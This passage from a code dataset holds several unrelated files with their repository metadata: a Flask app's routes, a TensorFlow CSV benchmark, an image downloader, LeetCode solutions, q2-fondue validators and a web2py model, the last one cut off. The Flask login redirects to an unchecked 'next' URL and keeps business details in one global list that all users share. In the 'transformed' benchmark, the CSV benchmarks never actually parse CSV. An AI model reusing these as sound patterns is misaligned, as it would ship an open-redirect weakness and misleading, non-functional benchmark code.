Post\nfrom flask_login import login_user, current_user, logout_user, login_required\nimport businessify.service_layer.capital_one.merchant_data as merchant_data\nimport businessify.config_k as config, businessify.service_layer.data_handler as dh\nfrom businessify.service_layer import isochrone as isochrone\nimport os\n\n\ndata_handler = dh.DataHandler()\n\nsavedBusiness = []\n\n\n@app.route(\"/home\")\ndef home():\n data = data_handler.get_list_by_state(\"ON\")\n isc = isochrone.get_isochrone_os('38.903400', '-77.042090')\n access_token = config.MAPBOX_ACCESS_TOKEN\n return render_template('analyze.html', data=data, ACCESS_TOKEN=access_token, isc1=isc[0],isc2 = isc[1], isc10 = isc[2\n ])\n\n@app.route(\"/analyze\", methods = ['POST','GET'])\ndef analyze():\n name = request.form[\"name\"]\n type = request.form[\"type\"]\n location = request.form[\"address\"]\n savedBusiness.append(name)\n savedBusiness.append(type)\n savedBusiness.append(location)\n data = data_handler.get_list_by_category(type)\n isc = data_handler.get_isochrone(location)\n return render_template('analyze.html', data=data,isc1=isc[0],isc2 = isc[1], isc10 = isc[2], title = name, bname = name, btype = type, blocation = location)\n\n\n\n@app.route(\"/background_get_isochrone\", methods =['POST','GET'])\ndef 
background_test():\n print(\"test\")\n location = request.form[\"place\"]\n isc = data_handler.get_isochrone(location)\n print(\"Returned\")\n print(isc)\n return jsonify(isc_data = isc)\n\n@app.route(\"/background_get_cluster\", methods =['POST','GET'])\ndef background_get_cluster():\n print(\"cluster test\")\n state = request.form[\"state\"]\n cluster_data = data_handler.get_list_by_state(state)\n print(\"Returned\")\n print(cluster_data)\n return cluster_data\n\n@app.route(\"/\")\n@app.route(\"/analyze_form\")\ndef analyze_form():\n return render_template('analyze_form.html', title='Analyze')\n\n\n@app.route(\"/register\", methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = RegistrationForm()\n if form.validate_on_submit():\n hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')\n user = User(username=form.username.data, email=form.email.data, password=hashed_password)\n db.session.add(user)\n db.session.commit()\n flash('Your account has been created! You are now able to log in', 'success')\n return redirect(url_for('login'))\n return render_template('register.html', title='Register', form=form)\n\n\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(email=form.email.data).first()\n if user and bcrypt.check_password_hash(user.password, form.password.data):\n login_user(user, remember=form.remember.data)\n next_page = request.args.get('next')\n return redirect(next_page) if next_page else redirect(url_for('home'))\n else:\n flash('Login Unsuccessful. Please check email and password', 'danger')\n return render_template('login.html', title='Login', form=form)\n\n\n@app.route(\"/logout\")\ndef logout():\n logout_user()\n return redirect(url_for('home'))\n\n\n@app.route(\"/account\")\n@login_required\ndef account():\n return render_template('account.html', title='Dashboard', bname = savedBusiness[0], btype = savedBusiness[1], blocation = savedBusiness[2] )\n\n\n\n@app.route('/map')\ndef map():\n #merchants = merchant_data.get_merchants()\n data = merchant_data.get_merchants_capital_one_json()\n isc = isochrone.get_isochrone_mapbox('-77.042090', '38.903400')\n\n access_token = config.MAPBOX_ACCESS_TOKEN\n print(access_token)\n return render_template('map-mapbox.html', data = data, ACCESS_TOKEN = access_token, isc = isc)\n\n\n@app.route('/map1')\ndef map1():\n data = data_handler.get_list_by_city(\"Vaughan\")\n isc = isochrone.get_isochrone_os('38.903400', '-77.042090')\n access_token = config.MAPBOX_ACCESS_TOKEN\n\n return render_template('map-google.html', data=data, ACCESS_TOKEN=access_token, isc=isc)\n\n\n@app.route('/service_layer/data/dataset.json')\ndef da():\n return send_from_directory(\"service_layer/data/\",\"dataset.json\")\n\n\n\n","repo_name":"iawale/Businessify","sub_path":"businessify/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15938341771","text":"\nimport os\nimport string\nimport tempfile\nfrom tensorflow.python.data.benchmarks import benchmark_base\nfrom tensorflow.python.data.experimental.ops import readers\nfrom tensorflow.python.data.ops import readers as core_readers\nfrom tensorflow.python.ops import parsing_ops\nfrom tensorflow.python.platform import gfile\nfrom 
tensorflow.python.platform import googletest\nclass CsvDatasetBenchmark(benchmark_base.DatasetBenchmarkBase):\n FLOAT_VAL = '1.23456E12'\n STR_VAL = string.ascii_letters * 10\n def _set_up(self, str_val):\n gfile.MakeDirs(googletest.GetTempDir())\n self._temp_dir = tempfile.mkdtemp(dir=googletest.GetTempDir())\n self._num_cols = [4, 64, 256]\n self._num_per_iter = 5000\n self._filenames = []\n for n in self._num_cols:\n fn = os.path.join(self._temp_dir, 'file%d.csv' % n)\n with open(fn, 'w') as f:\n row = ','.join(str_val for _ in range(n))\n f.write('\\n'.join(row for _ in range(100)))\n self._filenames.append(fn)\n def _tear_down(self):\n gfile.DeleteRecursively(self._temp_dir)\n def _run_benchmark(self, dataset, num_cols, prefix, benchmark_id):\n self.run_and_report_benchmark(\n dataset=dataset,\n num_elements=self._num_per_iter,\n name='%s_with_cols_%d' % (prefix, num_cols),\n iters=10,\n extras={\n 'model_name': 'csv.benchmark.%d' % benchmark_id,\n 'parameters': '%d' % num_cols,\n },\n warmup=True)\n def benchmark_map_with_floats(self):\n self._set_up(self.FLOAT_VAL)\n for i in range(len(self._filenames)):\n num_cols = self._num_cols[i]\n kwargs = {'record_defaults': [[0.0]] * num_cols}\n dataset = core_readers.TextLineDataset(self._filenames[i]).repeat()\n self._run_benchmark(\n dataset=dataset,\n num_cols=num_cols,\n prefix='csv_float_map_decode_csv',\n benchmark_id=1)\n self._tear_down()\n def benchmark_map_with_strings(self):\n self._set_up(self.STR_VAL)\n for i in range(len(self._filenames)):\n num_cols = self._num_cols[i]\n kwargs = {'record_defaults': [['']] * num_cols}\n dataset = core_readers.TextLineDataset(self._filenames[i]).repeat()\n self._run_benchmark(\n dataset=dataset,\n num_cols=num_cols,\n prefix='csv_strings_map_decode_csv',\n benchmark_id=2)\n self._tear_down()\n def benchmark_csv_dataset_with_floats(self):\n self._set_up(self.FLOAT_VAL)\n for i in range(len(self._filenames)):\n num_cols = self._num_cols[i]\n kwargs = {'record_defaults': [[0.0]] * num_cols}\n dataset = core_readers.TextLineDataset(self._filenames[i]).repeat()\n self._run_benchmark(\n dataset=dataset,\n num_cols=num_cols,\n prefix='csv_float_fused_dataset',\n benchmark_id=3)\n self._tear_down()\n def benchmark_csv_dataset_with_strings(self):\n self._set_up(self.STR_VAL)\n for i in range(len(self._filenames)):\n num_cols = self._num_cols[i]\n kwargs = {'record_defaults': [['']] * num_cols}\n dataset = core_readers.TextLineDataset(self._filenames[i]).repeat()\n self._run_benchmark(\n dataset=dataset,\n num_cols=num_cols,\n prefix='csv_strings_fused_dataset',\n benchmark_id=4)\n self._tear_down()\nif __name__ == '__main__':\n benchmark_base.test.main()\n","repo_name":"Mockingbird01001/NLG-code-generator-LSTM","sub_path":"work/data/data_model/batch_3/csv_dataset_benchmark.py.transformed.py","file_name":"csv_dataset_benchmark.py.transformed.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13447261887","text":"# -*- coding: utf-8 -*-\n\n# !/usr/bin/python\n\n# Note: requires the tqdm package (pip install tqdm)\n\n# Note to Kagglers: This script will not run directly in Kaggle kernels. You\n# need to download it and run it on your local machine.\n\n# Downloads images from the Google Landmarks dataset using multiple threads.\n# Images that already exist will not be downloaded again, so the script can\n# resume a partially completed download. 
All images will be saved in the JPG\n# format with 90% compression quality.\n\nimport csv\nimport multiprocessing\nimport os\nimport sys\nfrom io import BytesIO\nfrom urllib import request\n\nimport tqdm\nfrom PIL import Image\n\ntrain_category_download_max_count = 50;\n\ndef parse_data(data_file):\n csvfile = open(data_file, 'r')\n csvreader = csv.reader(csvfile)\n id_url_cat_list = [line[:3] for line in csvreader]\n return id_url_cat_list[1:] # Chop off header\n\n\ndef download_image(id_url_cat):\n out_dir = sys.argv[2]\n\n if len(id_url_cat) >= 3:\n (id, url, cat) = id_url_cat\n else:\n (id, url) = id_url_cat\n cat = \"\"\n\n sub_folder = os.path.join(out_dir, cat)\n if not os.path.exists(sub_folder):\n os.makedirs(sub_folder)\n\n # If it's train data, only download train_category_download_max_count files\n if cat:\n path, dirs, files = next(os.walk(sub_folder))\n file_count = len(files)\n if file_count >= train_category_download_max_count:\n return 0\n\n filename = os.path.join(sub_folder, '{}.jpg'.format(id))\n\n if os.path.exists(filename):\n # print('Image {} already exists. Skipping download.'.format(filename))\n return 0\n\n try:\n response = request.urlopen(url)\n image_data = response.read()\n except:\n print('Warning: Could not download image {} from {}'.format(id, url))\n remove_file(filename)\n return 1\n\n try:\n pil_image = Image.open(BytesIO(image_data))\n except:\n print('Warning: Failed to parse image {}'.format(id))\n remove_file(filename)\n return 1\n\n try:\n pil_image_rgb = pil_image.convert('RGB')\n except:\n print('Warning: Failed to convert image {} to RGB'.format(id))\n remove_file(filename)\n return 1\n\n try:\n pil_image_rgb.save(filename, format='JPEG', quality=90)\n except:\n print('Warning: Failed to save image {}'.format(filename))\n remove_file(filename)\n return 1\n\n return 0\n\n\ndef remove_file(file_path):\n try:\n os.remove(file_path)\n except:\n return 0\n\n return 0\n\n\ndef loader():\n if len(sys.argv) != 3:\n print('Syntax: {} <data_file.csv> <output_dir/>'.format(sys.argv[0]))\n sys.exit(0)\n (data_file, out_dir) = sys.argv[1:]\n\n id_url_cat_list = parse_data(data_file)\n pool = multiprocessing.Pool(processes=4) # Num of CPUs\n failures = sum(tqdm.tqdm(pool.imap_unordered(download_image, id_url_cat_list), total=len(id_url_cat_list)))\n print('Total number of download failures:', failures)\n pool.close()\n pool.terminate()\n\n\n# arg1 : data_file.csv\n# arg2 : output_dir\nif __name__ == '__main__':\n loader()\n","repo_name":"allenwu5/kaggle","sub_path":"GLRC/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30638352660","text":"\"\"\"\nSolution for 721. Accounts Merge\nhttps://leetcode.com/problems/accounts-merge/\n\"\"\"\nfrom collections import defaultdict\nfrom typing import List\n\nclass Solution:\n \"\"\"\n Runtime: 244 ms, faster than 44.73% of Python3 online submissions for Accounts Merge.\n Memory Usage: 27.5 MB, less than 11.11% of Python3 online submissions for Accounts Merge.\n \"\"\"\n def accountsMerge(self, accounts: List[List[str]]) -> List[List[str]]:\n \"\"\"\n Given a list accounts, each element accounts[i] is a list of strings, where the first element accounts[i][0] is a name, and the rest of the elements are emails representing emails of the account.\n\n Now, we would like to merge these accounts. 
Two accounts definitely belong to the same person if there is some email that is common to both accounts. Note that even if two accounts have the same name, they may belong to different people as people could have the same name. A person can have any number of accounts initially, but all of their accounts definitely have the same name.\n\n After merging the accounts, return the accounts in the following format: the first element of each account is the name, and the rest of the elements are emails in sorted order. The accounts themselves can be returned in any order.\n\n Example 1:\n Input:\n accounts = [[\"John\", \"johnsmith@mail.com\", \"john00@mail.com\"], [\"John\", \"johnnybravo@mail.com\"], [\"John\", \"johnsmith@mail.com\", \"john_newyork@mail.com\"], [\"Mary\", \"mary@mail.com\"]]\n Output: [[\"John\", 'john00@mail.com', 'john_newyork@mail.com', 'johnsmith@mail.com'], [\"John\", \"johnnybravo@mail.com\"], [\"Mary\", \"mary@mail.com\"]]\n Explanation:\n The first and third John's are the same person as they have the common email \"johnsmith@mail.com\".\n The second John and Mary are different people as none of their email addresses are used by other accounts.\n We could return these lists in any order, for example the answer [['Mary', 'mary@mail.com'], ['John', 'johnnybravo@mail.com'],\n ['John', 'john00@mail.com', 'john_newyork@mail.com', 'johnsmith@mail.com']] would still be accepted.\n Note:\n\n The length of accounts will be in the range [1, 1000].\n The length of accounts[i] will be in the range [1, 10].\n The length of accounts[i][j] will be in the range [1, 30].\n\n Args:\n accounts:\n\n Returns:\n\n \"\"\"\n return self.union_find(accounts)\n\n def dfs(self, accounts: List[List[str]]) -> List[List[str]]:\n \"\"\"\n A DFS solution that runs in O(NM) in time and O(N+M) in space where N = #\n of accounts and M = # of emails\n\n Args:\n accounts:\n\n Returns:\n\n \"\"\"\n name_map = {}\n graph = defaultdict(list)\n for account in accounts:\n for email in account[1:]:\n graph[account[1]].append(email)\n graph[email].append(account[1])\n name_map[email] = account[0]\n\n seen = set()\n res = []\n\n for email in graph:\n if email not in seen:\n seen.add(email)\n stack = [email]\n emails = []\n\n while stack:\n node = stack.pop()\n emails.append(node)\n\n for neigh in graph[node]:\n if neigh not in seen:\n seen.add(neigh)\n stack.append(neigh)\n res.append([name_map[email]] + sorted(emails))\n return res\n\n def union_find(self, accounts: List[List[str]]) -> List[List[str]]:\n \"\"\"\n \n\n Args:\n accounts:\n\n Returns:\n\n \"\"\"\n parents, rank = list(range(10001)), [0] * 10001\n\n def find(p):\n if parents[p] != p:\n parents[p] = find(parents[p])\n return parents[p]\n\n def union(p, q):\n p1, p2 = find(p), find(q)\n if p1 == p2:\n return\n if rank[p1] > rank[p2]:\n parents[p2] = p1\n elif rank[p1] < rank[p2]:\n parents[p1] = p2\n else:\n parents[p1] = p2\n rank[p2] += 1\n\n email_to_name = {}\n email_to_id = {}\n i = 0\n\n for account in accounts:\n for email in account[1:]:\n email_to_name[email] = account[0]\n if email not in email_to_id:\n email_to_id[email] = i\n i += 1\n union(email_to_id[account[1]], email_to_id[email])\n\n id_to_emails = defaultdict(list)\n for email in email_to_name:\n id_to_emails[find(email_to_id[email])].append(email)\n\n return [[email_to_name[v[0]]] + sorted(v) for v in 
id_to_emails.values()]\n","repo_name":"KKosukeee/CodingQuestions","sub_path":"LeetCode/721_accounts_merge.py","file_name":"721_accounts_merge.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41525877493","text":"import itertools\n\nimport pandas as pd\nfrom qiime2.plugin import ValidationError\nfrom qiime2.plugin import model\nfrom qiime2.metadata.base import is_id_header, FORMATTED_ID_HEADERS\nfrom q2_fondue.entrezpy_clients._utils import PREFIX\n\n\nclass SRAMetadataFormat(model.TextFileFormat):\n\n REQUIRED_IDS = [\n 'ID', 'Biosample ID', 'Bioproject ID', 'Experiment ID',\n 'Study ID', 'Sample Accession'\n ]\n REQUIRED_HEADER_FIELDS = [\n 'Organism', 'Instrument', 'Platform', 'Bases', 'Bytes', 'Public',\n 'Library Selection', 'Library Source', 'Library Layout'\n ]\n REQUIRED_HEADER_FIELDS.extend(REQUIRED_IDS)\n\n def _validate(self):\n df = pd.read_csv(str(self), sep='\\t')\n\n missing_cols = [\n x for x in self.REQUIRED_HEADER_FIELDS if x not in df.columns]\n if missing_cols:\n raise ValidationError(\n 'Some required columns are missing from the metadata file: '\n f'{\", \".join(missing_cols)}.'\n )\n\n # some IDs must be present in all samples\n nans = df.isnull().sum(axis=0)[self.REQUIRED_IDS]\n missing_ids = nans.where(nans > 0).dropna().index.tolist()\n if missing_ids:\n raise ValidationError(\n 'Some samples are missing IDs in the following fields: '\n f'{\", \".join(missing_ids)}.'\n )\n\n def _validate_(self, level):\n self._validate()\n\n\nSRAMetadataDirFmt = model.SingleFileDirectoryFormat(\n 'SRAMetadataDirFmt', 'sra-metadata.tsv', SRAMetadataFormat\n)\n\n\nclass SRAFailedIDsFormat(model.TextFileFormat):\n \"\"\"\n This is a \"fake\" format only used to store a list of failed SRA IDs,\n which can be converted to QIIME's metadata and input into any fondue\n action.\n \"\"\"\n\n def _validate_(self, level):\n df = pd.read_csv(str(self), sep='\\t', index_col=0)\n\n if df.shape[1] > 1:\n raise ValidationError(\n 'Failed IDs artifact should only contain a single column '\n 'with error message for the runs that could not be fetched '\n '(indexed by run ID).'\n )\n\n\nSRAFailedIDsDirFmt = model.SingleFileDirectoryFormat(\n 'SRAFailedIDsDirFmt', 'sra-failed-ids.tsv', SRAFailedIDsFormat\n)\n\n\nclass NCBIAccessionIDsFormat(model.TextFileFormat):\n \"\"\"\n This is a format used to store a list of SRA accession IDs (run,\n study, BioProject, sample and experiment IDs), which can be converted\n to QIIME's metadata. Artifacts containing of run, study and BioProject\n IDs can be input into any fondue action.\n \"\"\"\n\n ALLOWED_PREFIXES = tuple(itertools.chain(*[\n v for k, v in PREFIX.items()\n if k in ('bioproject', 'run', 'study', 'sample', 'experiment')\n ]))\n\n def _validate_id(self, _id: str):\n if not _id.startswith(self.ALLOWED_PREFIXES):\n raise ValidationError(\n 'Some of the provided IDs are invalid - only SRA run, study, '\n 'BioProject, sample and experiment IDs are allowed. 
Please '\n                'check your input and try again.'\n            )\n\n    def _validate_(self, level):\n        df = pd.read_csv(str(self), sep='\\t')\n        cols = df.columns.tolist()\n\n        if df.shape[1] > 2 or (df.shape[1] == 2 and not any(\n                x in cols for x in ['doi', 'DOI'])):\n            raise ValidationError(\n                'NCBI Accession IDs artifact should only contain a single '\n                'column with IDs of the SRA runs, studies or NCBI\\'s '\n                'BioProjects and an optional column `doi` with '\n                'associated DOIs.'\n            )\n\n        # check that there is a valid ID header:\n        if not any([is_id_header(x) for x in cols]):\n            raise ValidationError(\n                f'NCBI Accession IDs artifact must contain a valid '\n                f'ID header from {FORMATTED_ID_HEADERS}.'\n            )\n\n        df.iloc[:, 0].apply(self._validate_id)\n\n\nNCBIAccessionIDsDirFmt = model.SingleFileDirectoryFormat(\n    'NCBIAccessionIDsDirFmt', 'ncbi-accession-ids.tsv', NCBIAccessionIDsFormat\n)\n","repo_name":"bokulich-lab/q2-fondue","sub_path":"q2_fondue/types/_format.py","file_name":"_format.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"}
{"seq_id":"8458638233","text":"# -*- coding: utf-8 -*-\n\n# -------------------------------------------------------------------------\n# AppConfig configuration made easy. Look inside private/appconfig.ini\n# Auth is for authentication and access control\n# -------------------------------------------------------------------------\nfrom gluon.contrib.appconfig import AppConfig\nfrom gluon.tools import Auth\n\n# -------------------------------------------------------------------------\n# This scaffolding model makes your app work on Google App Engine too\n# File is released under public domain and you can use without limitations\n# -------------------------------------------------------------------------\n\nif request.global_settings.web2py_version < \"2.15.5\":\n    raise HTTP(500, \"Requires web2py 2.15.5 or newer\")\n\n# -------------------------------------------------------------------------\n# if SSL/HTTPS is properly configured and you want all HTTP requests to\n# be redirected to HTTPS, uncomment the line below:\n# -------------------------------------------------------------------------\n# request.requires_https()\n\n# -------------------------------------------------------------------------\n# once in production, remove reload=True to gain full speed\n# -------------------------------------------------------------------------\nconfiguration = AppConfig(reload=True)\n\nif not request.env.web2py_runtime_gae:\n    # ---------------------------------------------------------------------\n    # if NOT running on Google App Engine use SQLite or other DB\n    # ---------------------------------------------------------------------\n    db = DAL(configuration.get('db.uri'),\n             pool_size=configuration.get('db.pool_size'),\n             migrate_enabled=configuration.get('db.migrate'),\n             check_reserved=['all'])\nelse:\n    # ---------------------------------------------------------------------\n    # connect to Google BigTable (optional 'google:datastore://namespace')\n    # ---------------------------------------------------------------------\n    db = DAL('google:datastore+ndb')\n    # ---------------------------------------------------------------------\n    # store sessions and tickets there\n    # ---------------------------------------------------------------------\n    session.connect(request, response, db=db)\n    # ---------------------------------------------------------------------\n    # or store session in Memcache, Redis, etc.\n    # from 
gluon.contrib.memdb import MEMDB\n # from google.appengine.api.memcache import Client\n # session.connect(request, response, db = MEMDB(Client()))\n # ---------------------------------------------------------------------\n\n# -------------------------------------------------------------------------\n# by default give a view/generic.extension to all actions from localhost\n# none otherwise. a pattern can be 'controller/function.extension'\n# -------------------------------------------------------------------------\nresponse.generic_patterns = [] \nif request.is_local and not configuration.get('app.production'):\n response.generic_patterns.append('*')\n\n# -------------------------------------------------------------------------\n# choose a style for forms\n# -------------------------------------------------------------------------\nresponse.formstyle = 'bootstrap4_inline'\nresponse.form_label_separator = ''\n\n# -------------------------------------------------------------------------\n# (optional) optimize handling of static files\n# -------------------------------------------------------------------------\n# response.optimize_css = 'concat,minify,inline'\n# response.optimize_js = 'concat,minify,inline'\n\n# -------------------------------------------------------------------------\n# (optional) static assets folder versioning\n# -------------------------------------------------------------------------\n# response.static_version = '0.0.0'\n\n# -------------------------------------------------------------------------\n# Here is sample code if you need for\n# - email capabilities\n# - authentication (registration, login, logout, ... )\n# - authorization (role based authorization)\n# - services (xml, csv, json, xmlrpc, jsonrpc, amf, rss)\n# - old style crud actions\n# (more options discussed in gluon/tools.py)\n# -------------------------------------------------------------------------\n\n# host names must be a list of allowed host names (glob syntax allowed)\nauth = Auth(db, host_names=configuration.get('host.names'))\n\n# -------------------------------------------------------------------------\n# create all tables needed by auth, maybe add a list of extra fields\n# -------------------------------------------------------------------------\nauth.settings.extra_fields['auth_user'] = []\nauth.define_tables(username=False, signature=False)\n\n# -------------------------------------------------------------------------\n# configure email\n# -------------------------------------------------------------------------\nmail = auth.settings.mailer\nmail.settings.server = 'logging' if request.is_local else configuration.get('smtp.server')\nmail.settings.sender = configuration.get('smtp.sender')\nmail.settings.login = configuration.get('smtp.login')\nmail.settings.tls = configuration.get('smtp.tls') or False\nmail.settings.ssl = configuration.get('smtp.ssl') or False\n\n# -------------------------------------------------------------------------\n# configure auth policy\n# -------------------------------------------------------------------------\nauth.settings.registration_requires_verification = False\nauth.settings.registration_requires_approval = False\nauth.settings.reset_password_requires_verification = True\n\n# ------------------------------------------------------------------------- \n# read more at http://dev.w3.org/html5/markup/meta.name.html \n# -------------------------------------------------------------------------\nresponse.meta.author = 
configuration.get('app.author')\nresponse.meta.description = configuration.get('app.description')\nresponse.meta.keywords = configuration.get('app.keywords')\nresponse.meta.generator = configuration.get('app.generator')\nresponse.show_toolbar = configuration.get('app.toolbar')\n\n# -------------------------------------------------------------------------\n# your http://google.com/analytics id \n# -------------------------------------------------------------------------\nresponse.google_analytics_id = configuration.get('google.analytics_id')\n\n# -------------------------------------------------------------------------\n# maybe use the scheduler\n# -------------------------------------------------------------------------\nif configuration.get('scheduler.enabled'):\n from gluon.scheduler import Scheduler\n scheduler = Scheduler(db, heartbeat=configuration.get('scheduler.heartbeat'))\n\n# -------------------------------------------------------------------------\n# Define your tables below (or better in another model file) for example\n#\n# >>> db.define_table('mytable', Field('myfield', 'string'))\n#\n# Fields can be 'string','text','password','integer','double','boolean'\n# 'date','time','datetime','blob','upload', 'reference TABLENAME'\n# There is an implicit 'id integer autoincrement' field\n# Consult manual for more options, validators, etc.\n#\n# More API examples for controllers:\n#\n# >>> db.mytable.insert(myfield='value')\n# >>> rows = db(db.mytable.myfield == 'value').select(db.mytable.ALL)\n# >>> for row in rows: print row.id, row.myfield\n# -------------------------------------------------------------------------\n\n# -------------------------------------------------------------------------\n# after defining tables, uncomment below to enable auditing\n# -------------------------------------------------------------------------\n# auth.enable_record_versioning(db)\n\ndb.define_table('region',\n Field('region_name', 'string', length=80, unique=True),\n Field('alternate_name', 'string', length=80, unique=True),\n format='%(region_name)s')\n\ndb.region.region_name.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, db.region.region_name)]\ndb.region.alternate_name.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, db.region.alternate_name)]\n\ndb.define_table('branch',\n Field('branch_name', 'string', length=80, unique=True),\n Field('region_id', db.region, label='Region', notnull=True, ondelete='RESTRICT'),\n format='%(branch_name)s')\n\ndb.branch.branch_name.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, db.branch.branch_name)]\n\n# extending auth_user\n# auth.settings.extra_fields['auth_user'] = [\n# Field('branch_id', db.branch, label='Branch'), ]\n# auth.define_tables(username=False, signature=False)\n\n\ndb.define_table('warehouse',\n Field('warehouse_name', 'string', length=80, unique=True),\n Field('warehouse_code', 'string', length=20, unique=True),\n Field('branch_id', db.branch, label='Branch', ondelete='RESTRICT'),\n format='%(warehouse_name)s')\n\ndb.warehouse.warehouse_name.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, db.warehouse.warehouse_name)]\ndb.warehouse.warehouse_code.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, db.warehouse.warehouse_code)]\n\ndb.define_table('container',\n Field('container_name', 'string', length=20, unique=True),\n Field('container_shortname', 'string', length=20, unique=True),\n Field('weight', 'decimal(8,2)'),\n format='%(container_shortname)s')\n\ndb.container.container_name.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, 
db.container.container_name)]\ndb.container.container_shortname.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, db.container.container_shortname)]\n\n\ndb.define_table('commodity',\n Field('commodity_name', 'string', length=80, unique=True),\n Field('is_cereal', 'boolean', default=True),\n format='%(commodity_name)s')\n\ndb.commodity.commodity_name.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, db.commodity.commodity_name)]\ndb.commodity.is_cereal.default = True\n\ndb.define_table('variety',\n Field('variety_name', 'string', length=20, unique=True),\n Field('commodity_id', db.commodity, label='Commodity', ondelete='RESTRICT'),\n format='%(variety_name)s')\n\n\ndb.variety.variety_name.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, db.variety.variety_name)]\n\n# db.define_table('item',\n# Field('item_name', 'string', length=80, unique=True),\n# Field('variety_id', db.variety, label='Variety'),\n# Field('container_id', db.container, label='Container'),\n# Field('selling_price', 'decimal(15,2)'),\n# format='%(item_name)s')\n\n# db.item.item_name.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, db.item.item_name)]\n\n\ndb.define_table('point_of_sale',\n Field('pos_name', 'string', length=80, unique=True, label='POS Name'),\n Field('branch_id', db.branch, label='Branch', ondelete='RESTRICT' ),\n plural='Points of sales',\n format='%(pos_name)s')\n\ndb.point_of_sale.pos_name.requires = [IS_NOT_EMPTY(), IS_NOT_IN_DB(db, db.point_of_sale.pos_name)]\ndb.point_of_sale.branch_id.requires = IS_IN_DB(db, db.branch.id, '%(branch_name)s', zero=None)\n\n\ndb.define_table('org_access',\n Field('auth_user_id', db.auth_user, label='User', unique=True, ondelete='RESTRICT'),\n Field('access_level', 'string', requires=IS_IN_SET(['Point of Sale', 'Branch', 'Region'], zero=None)),\n Field('pos_id', db.point_of_sale, label='Point of Sale', ondelete='RESTRICT'),\n Field('branch_id', db.branch, label='Branch', ondelete='RESTRICT'),\n Field('region_id', db.region, label='Region', ondelete='RESTRICT'),\n )\ndb.org_access.auth_user_id.requires = IS_IN_DB(db, db.auth_user.id, '%(first_name)s %(last_name)s', _and=IS_NOT_EMPTY())\n\ndoc_stamp = db.Table(db, 'doc_stamp',\n Field('doc_date', 'date', default=request.now, requires=IS_DATE(format='%m/%d/%Y') ),\n Field('doc_number', 'string', length=40, unique=True))\n\ndb.define_table('AAP', \n Field('pos_id', db.point_of_sale, label='Point of Sale', ondelete='RESTRICT'),\n doc_stamp,\n Field('customer', 'string', length=80),\n # Field('item_id', db.item, label='Item'),\n Field('variety_id', db.variety, label='Variety', ondelete='RESTRICT'),\n Field('container_id', db.container, label='Container', ondelete='RESTRICT'),\n Field('bags', 'integer'),\n Field('net_kg_qty', 'decimal(15,3)', label='Net Kg or Quantity', represent = lambda v, r: '{:,}'.format(v) if v is not None else ''),\n Field('selling_price', 'decimal(15,2)'),\n Field('amount', 'decimal(15,2)', represent = lambda v, r: '{:,}'.format(v) if v is not None else ''),\n Field('check_no', 'string', length=40),\n Field('warehouse_id', db.warehouse, label='Warehouse', ondelete='RESTRICT'),\n Field('prepared_by', 'string', length=80, widget=lambda f, v: SQLFORM.widgets.text.widget(f, v, _rows=\"2\", _style=\"height: 100%;\")),\n Field('approved_by', 'string', length=80, widget=lambda f, v: SQLFORM.widgets.text.widget(f, v, _rows=\"2\", _style=\"height: 100%;\")),\n auth.signature, \n singular='AAP', plural='AAPs')\n\ndb.AAP.pos_id.requires = IS_IN_DB(db, db.point_of_sale.id, '%(pos_name)s', zero=None)\n# db.AAP.amount.represent = 
lambda v, r: DIV('{:,}'.format(v) if v is not None else '', _style='text-align: right; width=10px;')\n\ndb.define_table('client',\n                Field('client_name', 'string', length=80, unique=True),\n                )\n\ndb.define_table('user_location',\n                Field('auth_user_id', db.auth_user, label='User', unique=True, ondelete='RESTRICT'),\n                Field('region_id', db.region, label='Region', ondelete='RESTRICT'),\n                Field('branch_id', db.branch, label='Branch', ondelete='RESTRICT')\n                )","repo_name":"jeffplata/nfabsm","sub_path":"models/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":13482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"29471885183","text":"# Given an array of integers and a target value, find the two numbers in the array that add up to the target.\n\n# You may assume that each input has exactly one solution, and the same element cannot be used twice.\n\n# > Example:\n\n# Given nums = [2, 7, 11, 15], target = 9\n\n# Because nums[0] + nums[1] = 2 + 7 = 9\n# So return [0, 1]\n\n# EASY\nclass Solution(object):\n    def twoSum(self, nums, target):\n        \"\"\"\n        :type nums: List[int]\n        :type target: int\n        :rtype: List[int]\n        \"\"\"\n        lookup = {} # lookup stores the numbers already scanned, to reduce computation\n        for index, number in enumerate(nums): # enumerate yields the list together with indices\n            if target - number in lookup:\n                return [lookup[target - number],index]\n            lookup[number] = index # lookup[number] = index\n            print(\"lookup\",lookup)\n            print(\"ij\",index,number)\n        return []\n\n    \nif __name__ == \"__main__\":\n\n    numlist = [11,15,2,9,7]\n    target = 9\n    so = Solution()\n    n = so.twoSum(numlist, target)\n    print(\"Result: \", 